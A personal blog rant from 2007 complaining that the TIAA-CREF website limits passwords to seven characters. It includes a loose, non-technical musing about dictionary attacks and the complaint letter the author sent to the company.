In this day and age, it is unthinkable that a web site of such financial importance as TIAA-CREF would limit their password field to SEVEN CHARACTERS. That’s right, SEVEN CHARACTERS.
Thus, if a hacker were to somehow gain access to their password file, and ran a hash on it, they could probably decipher it in a matter of minutes, given the computing power of even the average desktop. How?
Well, since seven characters is a nice, round number, people probably make passwords like “Sparky” or “Jason”. The hacker could provide a number of common words like these, or even use a Dictionary File to provide the top 200 most common six and seven letter passwords used by people. Then, a hash program would be run against this file. This hash program would use every known encryption algorithm against each entry in the password file, and check the result. If the result happens to be one of these english-language words, then that algorithm is run against all the other entries in the password file. If suddenly the results yield many english-language words, then chances are, you’ve discovered the encryption algorithm, and you now have every single person’s password to log into the TIAA-CREF web site.
This will probably never happen. I’m sure that some other level of security is in place to prevent this from ever happening, and if they’re smart, they don’t even let one single person have access to the password file. But you know what the REAL REASON is that it pisses me off? Because the password I use for everything else is significantly longer than seven characters, and I don’t write any of them down, so, consequently I forget this password every time I want to use the site.
Forget it, I’m just going to start writing down my passwords.
But just to let them know I’m still not happy, I wrote them this charming feedback on their web site.
I see that your webmasters have still limited the password field to SEVEN CHARACTERS.
How long do you plan to persist in this annoying policy? I have over 20 different web sites that I must visit on a regular basis, to manage personal business. As such, I choose not to write down any of my passwords, but I instead use the same password for all of them, rotating every now and then. Perhaps not the best, but it’s my choice. So, every 3 months, I have to go through this business of forgetting my ID & Password, calling your number, listen to the vapid recording of “We also invite you to visit our web center at doubleyou doubleyou doubleyou dot tiaa-cref dot org”. DUH! Where do you think I got the PHONE NUMBER from? This is 2007, people. Then, finally, I can contact a rep and get my entire account remade.
Perhaps it does add a level of security to have my account & password reset all the time, and it’s not like hackers are all after retirement accounts. But I’m the worst type of customer, one who does system administration for a living, and I just gotta get my $0.02 in.
There, I’m done ranting and I’ve said my peace. I fully expect my input to be filed away in the “Deleted Items” folder, just like it was 6 months ago. I’m sure this message comes off as a smart-aleck, arrogant, know-it-all, but I’m too old to care if I’m wrong or not, I am the customer and… you know.
